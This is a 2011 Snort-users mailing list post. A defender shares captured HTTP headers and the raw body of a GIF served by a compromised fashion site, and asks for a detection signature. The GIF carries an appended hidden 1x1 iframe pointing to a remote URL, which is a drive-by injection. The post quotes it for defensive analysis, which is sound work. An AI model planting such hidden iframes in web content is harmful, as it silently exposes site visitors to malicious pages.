[Snort-users] iFrame's in gifs

Lay, James james.lay at ...15009...
Fri Jun 24 18:10:05 EDT 2011


Hey all!

Anyone got any leads on this or a sig for this?  Excitement below..I
have full pcap as well as the original image if anyone wants um.

James

Sanitized headers

GET /img/ HTTP/1.1
Cookie: <snip>
Host: magazine.gem-fashion.com
Accept: */*
Referer: http://magazine.gem-fashion.com/wearing-jewelry.html
Accept-Language: en-us
UA-CPU: x86
Connection: Keep-Alive

HTTP/1.1 404 Object Not Found
Date: Fri, 24 Jun 2011 21:15:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Set-Cookie: <snip>; path=/
Content-Length: 1221
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: image/gif



GIF87a.............DBD...$"$...dbd.........TRT...424...trt....
....LJL...,*,...ljl.........\Z\...<:<...|z|.........DFD...$&$...dfd.....
....TVT...464...tvt.........LNL...,.,...lnl.........\^\...<><...|~|...,.
............pH,....r.l:...tJ.Z...v..z...x.....%.<>...5;..o. .~..
.a
.I.a|{0f?..?...z.v.V.!1....#..2.G.a>....B..*.....1...Qa2+`..I..(!K)).B..
.....I..H...9P....n%3
....7E...B..-B...
JhC..H...G...TaX at ...15318...%. at ...846...!.........l.0.L....3n.r
.."%..h.....>........K.R......<l.....`.z.v.......-].\..G.0:.. at ...15319...#?.r.
.....\x.."L.7..6M..-..?r.. at ...2568...
..Q]b.......H4.3....&.........^|X.A..s./g........
Y.....O...P.)... at ...979...;..r.p..6y....^..;,w.....i...4..p.x..I..E
...).<2
.......$...... ^.2.vo....`.(..y...B
M<..1
...dm)....y0.~.. ..D...Cs
.'B.#LD.w?..A.F.......b.....4d.0.5..`..9%..... at ...15320...
.!e.U^.Z..  .. at ...846...@-BP8fy....; ..C.h.&.`..3..D<p.....%.0.0e...&D
b.....B..4;.D.r7........P
eJ(n.>$......y..I.!....~!Jj^>V..+...BX.....n..p.......2. at ...15321...~
......
.!..
!p..(|.|.....!A0>......PA..d0d.>.yD......1..B....B.-.x...'.p.H...`.2.$..
..q.\....7D..
..|..e:..`............*3.1..X.!.PA.;.m..H....;<iframe
src='http://alaqiq.net/quran/gstata/index.php' width='1' height='1'
style='visibility: hidden;'></iframe>




More information about the Snort-users mailing list